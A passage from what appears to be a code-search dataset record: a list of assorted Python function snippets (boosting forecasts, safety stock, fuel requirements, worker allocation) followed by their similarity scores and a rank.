0", "def useWater(self, used):\n self.amount = max(0, self.amount - used)", "def new_revenue(self) -> float:\n revenue_collections = self.demand_served() * self.inputs.revenue_per_m3\n return revenue_collections + self.revenue_landfill()", "def soft_thresh(x: float, lmb: float) -> float:\n if x < lmb:\n return x + lmb\n elif x > lmb:\n return x - lmb\n else:\n return 0.0", "def calculate_overbook_num(self):\n\n overbook_level_decimal = self.overbook_level / float(100.0)\n return self.num_rooms + math.ceil(overbook_level_decimal * self.num_rooms)", "def lower_bound(self) -> float:\n ...", "def Componentwise_Boosting(df_train, df_test, nu):\n\n # number of individual forecasts and number of periods\n K = df_test.shape[1]\n T = df_train.shape[0]\n T_test = df_test.shape[0]\n\n # variable of interest\n y = df_train.iloc[:, 0].values[:, np.newaxis]\n y_bar = np.mean(y)\n\n # individual forecasts\n F = np.swapaxes(df_train.iloc[:, 1:].values, 0, 1)[:, :, np.newaxis]\n F_t = np.swapaxes(F, 1, 2)\n F_test = np.swapaxes(df_test.values, 0, 1)[:, :, np.newaxis]\n\n # 5-fold CV to determine optimal M\n # length of training and testing sets\n T_cv_test = int(T/5)\n T_cv_train = T - T_cv_test\n\n # initialize vector to store the precision of fit\n SSR_vec = np.full(1000, 0, dtype=float)\n\n # find the optimal number of boosting iterationts using 5-fold CV\n # CV folds\n for k in range(5):\n\n # definition of the test and training sample for the given CV round\n cv_index = np.full(T, True, dtype=bool)\n cv_index[(k*T_cv_test):((k+1)*T_cv_test)] = False\n\n y_cv = y[cv_index]\n y_cv_bar = np.mean(y_cv)\n y_cv_test = y[~cv_index]\n\n F_cv = F[:, cv_index, :]\n F_cv_t = F_t[:, :, cv_index]\n F_cv_test = F[:, ~cv_index, :]\n\n # initialization step\n psi = np.tile(y_cv_bar, (T_cv_train, 1))\n psi_test = np.tile(y_cv_bar, (T_cv_test, 1))\n\n # main steps\n for m in range(1000):\n\n # compute the negative gradient vector\n u = y_cv - psi\n\n # regress the negative gradient vector on the ind. 
forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_cv_t, F_cv),\n np.matmul(F_cv_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T_cv_train), (u - (beta_hat * F_cv))**2)\n\n # find the minimum SSR and its corresponding ind.forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F_cv[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_cv_test[\n k_star, :, :]\n\n # save the precision of the fit\n SSR_vec[m] += np.sum((y_cv_test - psi_test)**2)\n\n # find number of iterations for which the MSE is the lowest\n M = np.argmin(SSR_vec) + 1\n\n # final Gradient Boosting with pre-determined number of iterations M\n # initialization step\n psi = np.tile(y_bar, (T, 1))\n psi_test = np.tile(y_bar, (T_test, 1))\n\n # main steps\n for m in range(M):\n\n # compute the negative gradient vector\n u = y - psi\n\n # regress the negative gradient vector on the individual forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_t, F),\n np.matmul(F_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T), (u - (beta_hat * F))**2)\n\n # find the minimum SSR and its corresponding individual forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_test[k_star, :, :]\n\n # predictions\n df_pred = pd.DataFrame(\n {\"Componentwise Boosting\": psi_test.flatten()},\n index=df_test.index\n )\n\n return df_pred", "def test_safety_stock(self):\n safety_stock = self._uncertain_demand.safety_stock\n avg_order = sum([int(item) for item in self._data_set.values()]) //len(self._data_set)\n variance = [(item - avg_order) for item in self._data_set.values()]\n stdev = pow(sum([pow(j, 2) for j in variance]) / len(self._data_set), 0.5)\n cal_safety = lambda x, y, z: x * y * (z ** 0.5)\n test_safety = cal_safety(float(self._z_value), float(stdev), float(self._lead_time))\n self.assertEqual(float(safety_stock), float(test_safety))", "def overall_reduction(self):\n return 84", "def cost(self):\n lg = len(self.guarantees.cnf)\n la = len(self.assumptions.cnf)\n\n \"\"\"heuristic\n Low: guarantees while assuming little (assumption set is bigger)\n High: guarantees while assuming a lot (assumption set is smaller)\"\"\"\n\n return la / lg", "def overhead(readings):\n return 100.0 * (int(readings[0]) + int(readings[1])) / (int(readings[2]) + int(readings[3]))", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def mimic_generation_capacity(base_grid, ref_grid):\n base_plant = base_grid.plant\n ref_plant = ref_grid.plant\n plant_scaling = ref_plant.Pmax / base_plant.Pmax\n # Element-wise division will return NaN for plants not in ref_grid\n plant_scaling = plant_scaling.fillna(0)\n change_table = _calculate_common_zone_factors(base_plant, ref_plant, plant_scaling)\n return change_table", "def buy_resource(self, num_res):\n check_pur = self.poss_purchases()\n if num_res in check_pur.keys():\n update_res = num_res\n for bin in self.capacity_list:\n for i, res in enumerate(bin[1]):\n if res == 1 and update_res > 0:\n bin[1][i] = 0\n update_res -= 1\n return (num_res, check_pur[num_res])\n else:\n return 'not enough resources'", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in 
endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def fs_used_including_snapshot_reserve(self):\n return self._fs_used_including_snapshot_reserve", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def bcRange(self):\n\t\treturn fabs(self.Upper - self.Lower)", "def calc_annual_electric_savings (self):\n price = self.diesel_prices\n #TODO add rural v non rural\n self.base_generation_cost = self.electric_diesel_reduction * price\n\n\n self.proposed_generation_cost = self.maintenance_cost\n\n self.annual_electric_savings = self.base_generation_cost - \\\n self.proposed_generation_cost\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def prescaler(self) -> int:" ]
[ "0.6212213", "0.5960155", "0.59591246", "0.58988106", "0.57863295", "0.5742012", "0.56890213", "0.5643248", "0.5618332", "0.56007034", "0.55502635", "0.55463886", "0.5537825", "0.551547", "0.5508426", "0.54879606", "0.5471865", "0.54627365", "0.5456973", "0.545685", "0.5449931", "0.54451865", "0.5411737", "0.5410543", "0.5409004", "0.53970325", "0.53886425", "0.5338527", "0.53322047", "0.5325783", "0.5319092", "0.53092116", "0.5301152", "0.5287885", "0.5285471", "0.5284035", "0.52802616", "0.52590275", "0.5253795", "0.52535844", "0.5251049", "0.5244019", "0.5242395", "0.5239526", "0.52340674", "0.5230234", "0.52249736", "0.5208666", "0.520263", "0.519616", "0.51783067", "0.51687056", "0.5168119", "0.5167897", "0.51443934", "0.51338583", "0.51307863", "0.51265764", "0.5125124", "0.51136833", "0.51119024", "0.51106834", "0.5104637", "0.5089365", "0.5087533", "0.5086997", "0.50829935", "0.5082549", "0.50658965", "0.5065678", "0.5060141", "0.50601184", "0.50486046", "0.50444955", "0.5043519", "0.50376934", "0.50247216", "0.5021721", "0.50210375", "0.5020717", "0.5019606", "0.50179726", "0.50084776", "0.5002881", "0.5000679", "0.4990686", "0.49881756", "0.4985235", "0.4983722", "0.49757388", "0.4973242", "0.4970725", "0.4965482", "0.49640235", "0.49577102", "0.495653", "0.49547645", "0.49447912", "0.49389136", "0.49345282" ]
0.49897957
86
Calculate the reserve factor for Material Failure by calculating the critical load and comparing it to the applied load. Return the reserve factor adjusted for inequalities based around >= 0
def matFail(dim):
    bst = dim[0]
    tst = dim[1]
    tsk = dim[2]
    Et = (Esk * tsk) + (Est * ((bst * tst) / bsk))
    Nmat = Et*maxstrain # Critical Load
    rsf = Nmat/Nx
    return rsf - 1.1 # Using a target Reserve Factor of >=1.1
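The snippet above references five names it never defines (Esk, Est, bsk, maxstrain, Nx); in the source project these are presumably module-level material and loading constants. A minimal self-contained sketch with placeholder values, all assumed purely for illustration:

# Hypothetical constants: the real values come from the source project's
# material data and load case, not from this document.
Esk = 70e9         # skin Young's modulus [Pa] (assumed)
Est = 70e9         # stringer Young's modulus [Pa] (assumed)
bsk = 0.2          # skin bay width [m] (assumed)
maxstrain = 0.005  # allowable material strain [-] (assumed)
Nx = 1.0e6         # applied running load [N/m] (assumed)

def matFail(dim):
    bst, tst, tsk = dim  # stringer width, stringer thickness, skin thickness
    Et = (Esk * tsk) + (Est * ((bst * tst) / bsk))  # smeared axial stiffness [N/m]
    Nmat = Et * maxstrain   # critical load [N/m]
    rsf = Nmat / Nx         # reserve factor against the applied load
    return rsf - 1.1        # >= 0 when the target RF of 1.1 is met

print(matFail([0.03, 0.002, 0.003]))

A non-negative return value indicates the design meets the 1.1 target reserve factor, with the magnitude giving the remaining margin.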
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_load_factor(self):\n # Your code here\n return self.total_items / self.capacity", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def getRepairCapacity(self):\n return int(self.myDesign.getSYCRequired() * (1-(self.strength/100.0)))", "def internal_external_canopy_heat_capacity(lumped_cover_heat_capacity: float) -> float:\n return 0.1 * lumped_cover_heat_capacity", "def test_getThermalExpansionFactorConservedMassByLinearExpansionPercent(self):\n hotTemp = 700.0\n dLL = self.component.material.linearExpansionFactor(\n Tc=hotTemp, T0=self._coldTemp\n )\n ref = 1.0 + dLL\n cur = self.component.getThermalExpansionFactor(Tc=hotTemp)\n self.assertAlmostEqual(cur, ref)", "def get_fuel_requirements(mass: int) -> int:\n return int(mass / 3) - 2", "def fuel_required(mass):\n return int(floor(mass / 3) - 2)", "def calculate_effective_capacitance(self, load):\n c_load = load\n # In fF\n c_para = spice[\"min_tx_drain_c\"] * (self.nmos_size / parameter[\"min_tx_size\"])\n transition_prob = 0.1875\n return transition_prob * (c_load + c_para)", "def test_excess_quantity(self):\n excess = self._uncertain_demand.excess_stock\n avg_order = sum([int(item) for item in self._data_set.values()]) //len(self._data_set)\n variance = [(item - avg_order) for item in self._data_set.values()]\n stdev = pow(sum([pow(j, 2) for j in variance]) / len(self._data_set), 0.5)\n cal_safety = lambda x, y, z: x * y * (z ** 0.5)\n safety_stock = cal_safety(float(self._z_value), float(stdev), float(self._lead_time))\n cal_reorder_level = lambda x, y, z: ((x ** 0.5) * y) + z\n reorder = cal_reorder_level(float(self._lead_time), avg_order, float(safety_stock))\n cal_excess = lambda x, y, z: round(x - (y + (y - z)), 0) if x > y + (y - z) else 0\n test_excess = cal_excess(self._quantity_on_hand, reorder, safety_stock)\n self.assertEqual(int(excess), int(test_excess))", "def get_duct_linear_heat_loss_coefficient() -> float:\n return 0.49", "def penalty(self):\n return 0", "def get_fuel_total_saved (self):\n #~ print self.lost_heat_recovery\n #~ print self.intertie_offset_generation_fuel_used\n #~ print self.pre_intertie_generation_fuel_used\n #~ gen_eff = self.cd[\"diesel generation efficiency\"]\n #~ fuel_used = self.intertie_offset_generation / gen_eff\n\n generation_diesel_reduction = \\\n np.array(self.pre_intertie_generation_fuel_used\\\n [:self.actual_project_life])\n return - np.array(self.lost_heat_recovery[:self.actual_project_life]) +\\\n generation_diesel_reduction", "def fuel_calc(mass):\n return max((mass / 3) - 2, 0)", "def verify_load_feasibility(self):\n max_load = 0\n for pp in self.powerplants:\n max_load += pp[\"pmax\"]\n\n min_load = max_load\n for pp in self.powerplants:\n min_load = min(pp[\"pmin\"], min_load)\n\n if self.load > max_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too high for our powerstations \"\n return False\n\n if self.load < min_load:\n self.feasible = False\n self.unfeasible_reason = f\"Requested load {self.load/10} too low for our powerstations \"\n return False\n\n return True", "def calculate_criticality(self, item_hr):\n _error_code = 0\n _msg = 'RAMSTK SUCCESS: Calculating failure mode {0:d} criticality.'.\\\n format(self.mode_id)\n\n if item_hr < 0.0:\n _error_code = 2010\n _msg = _(u\"RAMSTK ERROR: Item hazard rate has a negative value.\")\n raise OutOfRangeError(_msg)\n if not 0.0 <= self.mode_ratio <= 1.0:\n _error_code = 2010\n _msg = _(\n u\"RAMSTK ERROR: Failure mode ratio is outside the range of \"\n 
u\"[0.0, 1.0].\")\n raise OutOfRangeError(_msg)\n if self.mode_op_time < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode operating time has a negative value.\")\n raise OutOfRangeError(_msg)\n if not 0.0 <= self.effect_probability <= 1.0:\n _error_code = 2010\n _msg = _(u\"Failure effect probability is outside the range \"\n u\"[0.0, 1.0].\")\n raise OutOfRangeError(_msg)\n\n self.mode_hazard_rate = item_hr * self.mode_ratio\n self.mode_criticality = self.mode_hazard_rate \\\n * self.mode_op_time * self.effect_probability\n\n if self.mode_hazard_rate < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode hazard rate has a negative value.\")\n raise OutOfRangeError(_msg)\n if self.mode_criticality < 0.0:\n _error_code = 2010\n _msg = _(u\"Failure mode criticality has a negative value.\")\n raise OutOfRangeError(_msg)\n\n return _error_code, _msg", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t, level):\n # note \"amt\" has units of AMOUNT not RATE (resource, not resource per second)\n sign = np.sign(amt)\n # are we storing or providing?\n #print('DEBUGG supposed current level:', level)\n if sign < 0:\n # we are being asked to consume some\n cap, meta = self.get_capacity(meta, raven_vars, dispatch, t)\n available_amount = cap[res] - level\n #print('Supposed Capacity, Only calculated ins sign<0 (being asked to consumer)',cap)\n else:\n # we are being asked to produce some\n available_amount = level\n # the amount we can consume is the minimum of the requested or what's available\n delta = sign * min(available_amount, abs(amt))\n return {res: delta}, meta", "def get_remaining_fuel(self):\n return min(self.liquid_fuel, self.oxidizer)", "def calculate_demand(self):\r\n \r\n for cell in self.cells:\r\n cell.demand = min(cell.volume, self.max_volume) /self.interval\r\n self.demand = self.cells[-1].demand", "def lookup_effective_mass_area_factor(self, cm):\n\n if cm == 0.0:\n return 0.0\n elif 0.0 < cm <= 165000.0:\n return 2.5\n else:\n return 3.2", "def total_sdram_requirements(self):", "def penalty_calc(self):\n self.p_budget = (self.tx_oma_min - self.rx_unstressed_sensitivity - self.fiber_conn_loss)*self.l_1\n\n # fiber attenuation,\n self.p_atten = self.alpha*self.length # column B\n\n # calculate bandwidth for RIN test (exclude transmitter)\n rin_inverse_bw = np.sqrt(np.square(1.0/self.bw_cd) + np.square(1.0/self.bw_md) + (0.477/(self.rx_bw**2))*self.l_1)\n rin_bw = 1.0 / rin_inverse_bw\n\n # see FC-MSQS-2 equation B.47 in Annex B.4 for the following k_rin = math.sqrt(2.0/math.pi)*erfinv(0.8)\n k_rin = 0.7\n\n # v_rin,\n self.v_rin = (k_rin*1E6*(self.rin_test_isi**2)*rin_bw*\n math.pow(10.0,0.1*self.rin)) # column AK\n\n # Prin,\n print('v_rin: ', self.v_rin)\n print('Q: ',self.Q)\n print('isi_dj_refl_closed :', self.isi_dj_refl_closed)\n self.p_rin = -10.0*np.log10(np.sqrt(1.0-np.multiply(self.v_rin, np.square(self.Q/self.isi_dj_refl_closed)))) # column R\n print(\"P_rin : \", self.p_rin)\n self.beta = (3.14159E-6*self.speedup*self.br_nominal *self.delta_lambda*self.d1*self.length) # column O\n self.sigma_mpn = (self.k_mpn/math.sqrt(2.0)*(self.l_1 -np.exp(-np.square(self.beta)))) # column P\n self.p_mpn = (-10.0*np.log10(np.sqrt(self.l_1 - (self.Q**2)*np.square(self.sigma_mpn)))) # column Q\n self.p_blw = (-10.0*math.log10(math.sqrt(1.0- ((self.Q*self.sigma_blw)/ self.isi_tp4_rx)**2))*self.l_1) # cell T13\n self.p_reflection = -10.0*np.log10(self.isi_reflection) # column N\n self.v_mn = (((1.0-math.pow(10.0,-0.2*self.pmn))/ (self.Q)**2)*self.l_1) # 
cell AG7\n print(\"isi_center : \", self.isi_center)\n\n self.p_isi_center = -10.0*np.log10(self.isi_center) # column J\n\n self.p_isi_corners = (-10.0*np.log10(self.isi_corners) - self.p_isi_center) # column K\n self.p_isi_dj_center = (-10.0*np.log10(self.isi_dj_refl_closed) - self.p_isi_center) # column L\n self.p_isi_dj_corners = (-10.0*np.log10(self.isi_dj_corners) -self.p_isi_center -self.p_isi_corners) # column M\n\n\n # calculate the \"cross\" penalty contribution, column S\n arg1 = ((self.sigma_blw**2 + self.v_rin)/ np.square(self.isi_dj_refl_closed))\n arg2 = self.l_1 - (self.Q**2)*(arg1 + self.v_mn + np.square(self.sigma_mpn))\n arg3 = (-10.0*np.log10(np.multiply(self.isi_dj_refl_closed, np.sqrt(arg2))))\n self.p_cross_center = ( # column S\n arg3\n - self.p_blw # cell T13\n - self.p_isi_center # column J\n - self.p_isi_dj_center # column L\n - self.p_mpn # column Q\n - self.p_reflection # column N\n - self.p_rin # column R\n - self.pmn*self.l_1) # cell G13\n print('p_isi_center: ', self.p_isi_center)\n\n # calculate the total power budget evaluated at the center of the eye\n self.p_total_center = ( # column T\n self.p_isi_center # column J\n + self.p_isi_dj_center # column L\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1) # cell G13\n # calculate the total power budget evaluated at the corner of the eye\n self.p_total_corners = (\n self.p_isi_center # column J\n + self.p_isi_corners # column K\n + self.p_atten # column B\n + self.p_mpn # column Q\n + self.p_reflection # column N\n + self.p_rin # column R\n + self.p_cross_center # column S\n + self.pmn*self.l_1 # cell G13\n + self.p_isi_dj_corners)# column M\n\n # receiver stressed sensitivity\n self.margin = ( self.p_budget\n - self.p_total_center) # column W\n\n self.rx_stressed_sensitivity = (\n self.tx_oma_min*self.l_1\n - self.chil\n - self.p_mpn\n - self.p_reflection\n - self.p_rin\n - 0.5*self.p_cross_center\n - self.pmn*self.l_1\n - self.margin[self.lnum//2]*self.l_1)\n\n\n # end of GbE10.penalty_calc\n #======================================================================+", "def test_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def test_optimal_thickness():\n structure = Material(input)\n assert (structure.calc_optimal_thickness() == 1.9552936422413782)", "def get_allowable_fraction_without(mem_to_reserve, cuda_device_index):\n current_free = get_free_gpu_memory(cuda_device_index)\n allowable = current_free - mem_to_reserve # 1GB\n allowable_fraction = allowable / current_free\n if allowable_fraction <= 0.0:\n raise ValueError(f\"Can't leave 1GB over for the inference kernel, because\"\n f\" there is only {allowable} total free GPU memory.\")\n return allowable_fraction", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 
2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). 
For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: [1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 